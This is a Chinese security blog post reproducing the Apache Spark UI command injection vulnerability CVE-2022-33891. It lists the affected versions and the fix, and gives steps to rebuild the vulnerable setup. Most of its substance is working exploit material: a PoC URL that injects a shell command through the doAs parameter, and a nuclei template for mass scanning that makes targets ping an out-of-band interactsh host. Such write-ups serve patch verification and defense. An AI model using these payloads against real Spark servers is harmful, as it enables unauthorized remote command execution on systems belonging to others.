Apache Spark UI 命令注入漏洞(CVE-2022-33891)

admin 2022年7月24日23:15:33Apache Spark UI 命令注入漏洞(CVE-2022-33891)已关闭评论97 views字数 710阅读2分22秒阅读模式

影响版本:

3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.

Fix:

https://github.com/apache/spark/pull/36315/files

直接拼接 bash -c执行导致漏洞的产生。

复现

下载:https://archive.apache.org/dist/spark/spark-3.2.1/spark-3.2.1.tgz

cd assembly
mvn package -DskipTests
cd ../bin
./spark-shell --conf spark.acls.enable=true

poc:http://172.16.2.1:4040/?doAs=open%20-a%20Calculator

图片

nuclei批量验证脚本:

id: apache-spark-shell-rce
info: name: apache-spark-shell-rce author: tangxiaofeng7 severity: high reference:   - https://github.com/tangxiaofeng7 tags: rce
requests: - method: GET   path: - '{{BaseURL}}/?doAs=`ping%20{{interactsh-url}}`'
   matchers:     - type: word       part: interactsh_protocol       name: http       words:         - "http" - "dns"

图片

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月24日23:15:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache Spark UI 命令注入漏洞(CVE-2022-33891)http://cn-sec.com/archives/1196891.html